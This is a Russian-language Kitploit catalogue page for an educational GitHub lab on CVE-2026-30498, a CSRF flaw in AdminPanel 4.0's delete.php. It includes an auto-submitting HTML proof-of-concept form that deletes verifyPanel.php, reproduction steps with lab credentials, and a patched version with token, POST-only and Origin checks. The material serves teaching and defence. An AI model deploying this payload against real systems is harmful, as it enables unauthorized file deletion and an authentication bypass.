Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-30498 — Образовательная демонстрация уязвимости CSRF в контролируемой лабораторной среде, включающая proof-of-concept эксплойт и исправленную версию с надлежащими механизмами защиты от CSRF. | Kitploit
Инструменты/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

Образовательная демонстрация уязвимости CSRF в контролируемой лабораторной среде, включающая proof-of-concept эксплойт и исправленную версию с надлежащими механизмами защиты от CSRF.

Репозиторий
1136 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-30498 – Уязвимость CSRF (AdminPanel 4.0)


Обзор

ID CVE: CVE-2026-30498 (Зарезервирован MITRE)
Автор обнаружения: Мехди Бен Хаму

Уязвимость Межсайтовой подделки запроса (CSRF) существует в конечной точке delete.php в AdminPanel 4.0.

Эта уязвимость позволяет злоумышленнику инициировать конфиденциальные действия (удаление файлов) от имени аутентифицированного пользователя без его согласия.


Технические детали

Уязвимость вызвана отсутствием механизмов защиты CSRF:

  • Отсутствует проверка CSRF-токена
  • Отсутствует проверка Origin / Referer
  • Конфиденциальное действие доступно через GET-запрос
  • Отсутствует проверка намерений пользователя

Уязвимая конечная точка обрабатывает запросы напрямую на основе пользовательской сессии без проверки источника запроса.


Воздействие

Успешная эксплуатация приводит к:

  • Удалению verifyPanel.php
  • Обходу аутентификации
  • Переходу приложения в режим установки
  • Возможной полной реинициализации системы

Затронутая версия

  • AdminPanel 4.0 и более ранние версии (архивный проект)

Сценарий атаки

Злоумышленник размещает вредоносную веб-страницу, которая отправляет поддельный запрос:

http://localhost:8080/delete.php?file=verifyPanel.php

Когда жертва (аутентифицированный пользователь) посещает эту страницу, браузер автоматически включает сессионные cookie, и запрос выполняется.


Доказательство концепции (PoC)

Вредоносная страница (злоумышленник)

<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
  <input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
  document.getElementById("csrfForm").submit();
</script>

Этот запрос автоматически отправляется с сессионным cookie жертвы.


Шаги воспроизведения

  1. Запустите сервер жертвы:
php -S localhost:8080
  1. Откройте страницу входа:
http://localhost:8080
  1. Войдите, используя:
admin / admin123
  1. Откройте страницу злоумышленника:
http://localhost:8081/evil.html
  1. Запустите CSRF-атаку
  2. Вернитесь на панель управления:
/panel/dashboard.php

Что происходит внутри

  1. Жертва входит в систему → создаётся сессионный cookie
  2. Страница злоумышленника отправляет поддельный запрос
  3. Браузер автоматически прикрепляет cookie
  4. Сервер выполняет удаление без проверки
  5. Система обнаруживает отсутствие файла аутентификации
  6. Приложение переходит в режим установки

Лабораторная среда (педагогическая симуляция)

Этот репозиторий включает контролируемую лабораторную среду для безопасного воспроизведения уязвимости.

Важно: Эта лаборатория является симуляцией и не представляет собой точную оригинальную кодовую базу AdminPanel.

Сброс лаборатории

Для сброса среды:

/reset.php

Исправленная версия (смягчение)

Безопасная версия реализована в:

delete_fixed.php

Добавленные меры защиты:

  • ✅ Проверка CSRF-токена
  • ✅ Только метод POST
  • ✅ Проверка Origin / Referer
  • ✅ Проверка сессии

Почему исправление работает

  • Злоумышленник не может получить доступ к CSRF-токену (политика Same-Origin)
  • Поддельные запросы не содержат действительного токена → отклоняются
  • Межсайтовые запросы блокируются через проверку Origin

Структура проекта

victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
    └── dashboard.php

attacker/
└── evil.html

Отказ от ответственности

Этот проект предназначен только для образовательных и исследовательских целей.
Не используйте эту уязвимость на системах без соответствующего разрешения.

Скачать инструмент